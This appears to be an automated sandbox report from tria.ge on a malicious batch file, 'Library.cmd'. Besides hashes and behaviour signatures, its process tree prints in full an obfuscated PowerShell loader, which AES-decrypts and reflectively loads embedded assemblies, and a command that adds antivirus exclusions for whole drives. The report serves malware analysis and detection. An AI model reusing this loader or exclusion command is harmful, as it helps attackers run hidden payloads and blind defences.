Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

25/07/2024, 23:32

240725-3jrj5sverf 8

25/07/2024, 19:34

240725-x96h4azenm 8

25/07/2024, 17:53

240725-wgedgaveml 8

25/07/2024, 17:32

240725-v4d6jsxekd 8

Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/07/2024, 17:32

General

  • Target

    Library.cmd

  • Size

    3.3MB

  • MD5

    705ac80b02f73faec8180190bd2b8ce2

  • SHA1

    4f1e20556015edeee8795ea7ef6137b4341b3d80

  • SHA256

    1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b

  • SHA512

    da1981a69dee947f2e490c07d452a2881b7a01d09bd6de70ebd9df648db6d8804bbdccff62c40d1a6796ff77ce107cfd01f1dce24369b2b973081c78e5d0de56

  • SSDEEP

    49152:8e90YDSczQOfmBTZ7fSU13LvMeEZng0PJFGrbxM+:0

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Library.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Library.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Library.cmd';$aYUO='LEWmKoaEWmKdEWmK'.Replace('EWmK', ''),'FEbiYrEbiYomBEbiYaseEbiY64EbiYStrEbiYinEbiYgEbiY'.Replace('EbiY', ''),'Invkamvokamvkkamvekamv'.Replace('kamv', ''),'TrvTXdavTXdnvTXdsfvTXdovTXdrmvTXdFinvTXdalvTXdBlovTXdckvTXd'.Replace('vTXd', ''),'CojZDOpjZDOyTjZDOojZDO'.Replace('jZDO', ''),'SplzVMQitzVMQ'.Replace('zVMQ', ''),'GeRWEbtRWEbCuRWEbrreRWEbntRWEbPrRWEboceRWEbsRWEbsRWEb'.Replace('RWEb', ''),'ChNhmQaNhmQnNhmQgeENhmQxNhmQtenNhmQsiNhmQonNhmQ'.Replace('NhmQ', ''),'EnoyyatoyyaryoyyaPooyyainoyyatoyya'.Replace('oyya', ''),'ElxdPsexdPsmxdPsenxdPstxdPsAtxdPs'.Replace('xdPs', ''),'Dblyiecblyiomblyipblyirblyieblyisblyisblyi'.Replace('blyi', ''),'MaAIfzinAIfzMoAIfzduAIfzleAIfz'.Replace('AIfz', ''),'RearCLadarCLLiarCLnesarCL'.Replace('arCL', ''),'CqIOIreaqIOItqIOIeDqIOIeqIOIcrqIOIypqIOItoqIOIrqIOI'.Replace('qIOI', '');powershell -w hidden;function IocxM($diQol){$NvznA=[System.Security.Cryptography.Aes]::Create();$NvznA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NvznA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NvznA.Key=[System.Convert]::($aYUO[1])('kL1UBtUuFDE9V9LM/Uk/WvdRxJsjj9H6CX3jPEUZ+No=');$NvznA.IV=[System.Convert]::($aYUO[1])('jvlbrCPvcqHagDjBk0TemQ==');$cPnJJ=$NvznA.($aYUO[13])();$gpChW=$cPnJJ.($aYUO[3])($diQol,0,$diQol.Length);$cPnJJ.Dispose();$NvznA.Dispose();$gpChW;}function uBxZK($diQol){$RwHhF=New-Object System.IO.MemoryStream(,$diQol);$fYqcC=New-Object System.IO.MemoryStream;$dpVKq=New-Object System.IO.Compression.GZipStream($RwHhF,[IO.Compression.CompressionMode]::($aYUO[10]));$dpVKq.($aYUO[4])($fYqcC);$dpVKq.Dispose();$RwHhF.Dispose();$fYqcC.Dispose();$fYqcC.ToArray();}$iBXfm=[System.IO.File]::($aYUO[12])([Console]::Title);$Hnkcn=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 5).Substring(2))));$AFLeb=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 6).Substring(2))));[System.Reflection.Assembly]::($aYUO[0])([byte[]]$AFLeb).($aYUO[8]).($aYUO[2])($null,$null);[System.Reflection.Assembly]::($aYUO[0])([byte[]]$Hnkcn).($aYUO[8]).($aYUO[2])($null,$null); "
        3⤵
          PID:2192
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Blocklisted process makes network request
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1588
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2936

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      3f01549ee3e4c18244797530b588dad9

      SHA1

      3e87863fc06995fe4b741357c68931221d6cc0b9

      SHA256

      36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

      SHA512

      73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3ajfz1y.45b.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1588-29-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/1588-24-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/1588-26-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/1588-25-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/3464-30-0x0000014FFA9F0000-0x0000014FFA9FA000-memory.dmp

      Filesize

      40KB

    • memory/3464-32-0x00007FFCD2C90000-0x00007FFCD2D4E000-memory.dmp

      Filesize

      760KB

    • memory/3464-13-0x0000014FFB6F0000-0x0000014FFB734000-memory.dmp

      Filesize

      272KB

    • memory/3464-12-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/3464-0-0x00007FFCB4EC3000-0x00007FFCB4EC5000-memory.dmp

      Filesize

      8KB

    • memory/3464-11-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/3464-31-0x00007FFCD2E90000-0x00007FFCD3085000-memory.dmp

      Filesize

      2.0MB

    • memory/3464-14-0x0000014FFBB30000-0x0000014FFBBA6000-memory.dmp

      Filesize

      472KB

    • memory/3464-33-0x0000014FFBF40000-0x0000014FFC1CA000-memory.dmp

      Filesize

      2.5MB

    • memory/3464-1-0x0000014FFB670000-0x0000014FFB692000-memory.dmp

      Filesize

      136KB

    • memory/3464-45-0x0000014F80000000-0x0000014F81000000-memory.dmp

      Filesize

      16.0MB

    • memory/3464-47-0x00007FFCB4EC3000-0x00007FFCB4EC5000-memory.dmp

      Filesize

      8KB

    • memory/3464-48-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB

    • memory/3464-49-0x00007FFCB4EC0000-0x00007FFCB5981000-memory.dmp

      Filesize

      10.8MB